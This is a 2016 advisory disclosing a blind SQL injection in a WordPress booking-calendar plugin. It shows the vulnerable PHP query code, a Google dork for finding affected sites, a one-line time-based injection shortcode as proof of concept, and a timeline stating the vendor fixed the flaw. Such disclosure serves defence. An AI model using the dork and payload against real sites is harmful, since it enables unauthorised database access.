# Exploit Title: Wordpress booking calendar contact form <=v1.0.23 - Unauthenticated blind SQL injection
# Date: 2016-02-08
# Google Dork: Index of /wp-content/plugins/booking-calendar-contact-form
# Exploit Author: Joaquin Ramirez Martinez [ i0 SEC-LABORATORY ]
# Vendor Homepage: http://wordpress.dwbooster.com/
# Plugin URI: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form
# Version: 1.0.23
# Tested on: windows 10 + firefox. 

==============
 Description
==============

Create a booking form with a reservation calendar or a classic contact form, connected to 
a PayPal payment button.
With the **Booking Calendar Contact Form** you can create a **classic contact form** or a 
**booking form with a reservation calendar**, connected to a PayPal payment button. The reservation 
calendar lets the customer select the start (ex: check-in) and end (ex: checkout) dates.

The **reservation calendar** is an optional item, so it can be disabled to create a **general 
purpose contact form**.

There are two types of bookings available in the calendar configuration: full day bookings or 
partial day bookings. With full day bookings the whole day is blocked / reserved while in partial 
day bookings the start and end dates are partially blocked as used for example in 
**room/hotel bookings**.

===================
 Technical details 
===================

Booking calendar plugin  is prone to a blind sql injection in the shortcode function ´dex_bccf_filter_content´
because there is not sanitization when the variable ´DEX_BCCF_CALENDAR_FIXED_ID´ is asigned and then is used
into function ´dex_bccf_get_public_form()´.

function dex_bccf_filter_content($atts) {
...
    extract(shortcode_atts(array(
        'calendar' => '',
        'user' => '',
                    ), $atts));
    if ($calendar != '')
        define('DEX_BCCF_CALENDAR_FIXED_ID', $calendar);
    ..

    return $buffered_contents;
}


function dex_bccf_get_public_form() {
    global $wpdb;

    if (defined('DEX_CALENDAR_USER') && DEX_CALENDAR_USER != 0)
        $myrows = $wpdb->get_results("SELECT * FROM " . DEX_BCCF_CONFIG_TABLE_NAME . " WHERE conwer=" . DEX_CALENDAR_USER);
    else if (defined('DEX_BCCF_CALENDAR_FIXED_ID'))
        $myrows = $wpdb->get_results("SELECT * FROM " . DEX_BCCF_CONFIG_TABLE_NAME . " WHERE id=" . DEX_BCCF_CALENDAR_FIXED_ID);
    else
        $myrows = $wpdb->get_results("SELECT * FROM " . DEX_BCCF_CONFIG_TABLE_NAME);
 ...
 }


==================
 Proof of concept
==================

An editor/author can add a ahortcode with his sql command into a post:


[CP_BCCF_FORM calendar=-1 or sleep(10)#]


==========
 CREDITS
==========

Vulnerability discovered by:
  Joaquin Ramirez Martinez [i0 security-lab]
  joaquin.ramirez.mtz.lab[at]gmail[dot]com
  https://www.facebook.com/I0-security-lab-524954460988147/
  https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q


========
TIMELINE
========

2016-02-01 vulnerability discovered
2016-02-05 reported to vendor
2016-02-08 released fixed plugin v1.0.24
2016-02-08 public disclosure